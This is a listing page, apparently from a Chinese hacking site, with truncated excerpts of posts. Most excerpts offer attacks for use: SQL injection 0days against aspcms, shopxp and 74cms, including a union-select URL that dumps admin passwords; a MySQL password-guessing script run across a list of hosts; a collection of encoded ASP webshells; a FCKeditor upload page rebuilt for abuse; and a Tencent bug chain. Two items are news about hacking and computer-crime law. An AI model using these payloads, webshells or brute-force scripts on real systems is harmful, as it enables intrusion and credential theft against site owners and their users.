aspcms建站系统注入0day
aspcms开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且 支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。 漏洞文件:/plug/productbuy.asp 对接收的参数id没有进行过滤而导致的注入漏洞 注入后的页面有跳转,所以要快,建议用快捷键复制 爆用户名EXP: https://www.webshell.cc/plug/productbuy.asp?id=2...
英国多家大型网站集体被土耳其黑客路过
据英国《卫报》9月5日报道,一个土耳其黑客组织日前对英国多家著名网站发起攻击, 包括《每日电讯报》网站、博彩公司必发(Betfair)的官方网站等等。专家警告称, 许多网络用户的密码和其他个人信息可能被偷。 报道称,一个自称“Turk Guvenligi”的黑客组织日前对英国多家著名网站发动攻击, 改变了访问路径。遭攻击的网站包括《每日电讯报》、博彩公司必发、UPS快递、电信运 营商沃达丰( Vo...
shopxp网上购物系统v7.4爆密码0day
版 本:shopxp网上购物系统 v7.4 关键词:inurl:shopxp_news.asp 后 台:shopxp_admin 暴密码的语句: /TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin ...
Discuz 1.5暴WEB路径漏洞
测试环境:discuz X1.5+nginx 1.0 漏洞文件source/function/function_core.php, 代码: $_G['setting']['domain']['app']['default'] && $content = preg_replace("/<a href=\"([^\"]+)\"/e", "rewriteoutput('site_d...
MYSQL服务器猜密码脚本
昨日渗透时 , 整段都是MYSQL服务器。在某个WEB下。用如下脚本来猜了一下MYSQL密码。还真有两个。在WEB下用脚本来弄也方便快捷。MSSQL的同理。。 这个是已知开了3306的。。 <?php $hostdb = array( '192.168.168.10', '192.168.168.20', '192.168.168.20', '192.168.168.40', '192.16...
7个ASP小马合集~!
1号小马 <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>Cx~</title> <%@ LANGUAGE = VBScript.Encode %> <%#@~^CgAAAA==[b:~K4N0/K3QMAAA==^#~@%> <...
腾讯3个鸡肋漏洞组合的利用及修复方案
简要描述: 权限绕过+跨站+服务端未验证=一夜之间4亿用户的悲剧 详细说明: 先登陆 http://faxin.soso.com/ 有cookie后打开下面的页面 <A href="http://faxin.soso.com/_JSON_Page_User_Getgold.<a%20href=" target=_blank http: www.2cto.com kf web php ?...
Fckeditor本地TEST.HTML
自从以前暴了TEST.HTML的上传0day以后,好多站长们多把TEST.HTML给删了。可是上传的 文件没删。这样的话可以自己在构造一个。下面是俺收集的。 把以下代码保存成TEST.HTML就行了。然后修改里面的上传文件。 <!-- * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyrig...
关于办理危害计算机信息系统安全刑事案件9月1号起施行
最高人民法院、最高人民检察院29日联合发布了《关于办理危害计算机信息系统安全刑事案件 应用法律若干问题的解释》。这个共有十一条的司法解释自2011年9月1日起施行。 司法解释针对危害计算机信息系统安全犯罪所涉及的定罪量刑标准、单位犯罪、共同犯罪、 术语界定等问题,进一步明确了相关刑事案件的法律适用标准。重点内容包括:明确了非法获 取计算机信息系统数据、非法控制计算机信息系统罪,提供侵入、非法控...
74cms sql注入漏洞
74cms sql注入漏洞 function getip() { if(getenv('HTTP_CLIENT_IP')){ $onlineip=getenv('HTTP_CLIENT_IP'); }else if(getenv('HTTP_X_FORWARDED_FOR')){ $onlineip=getenv('HTTP_X_FORWARDED_FOR'); }else if(getenv('...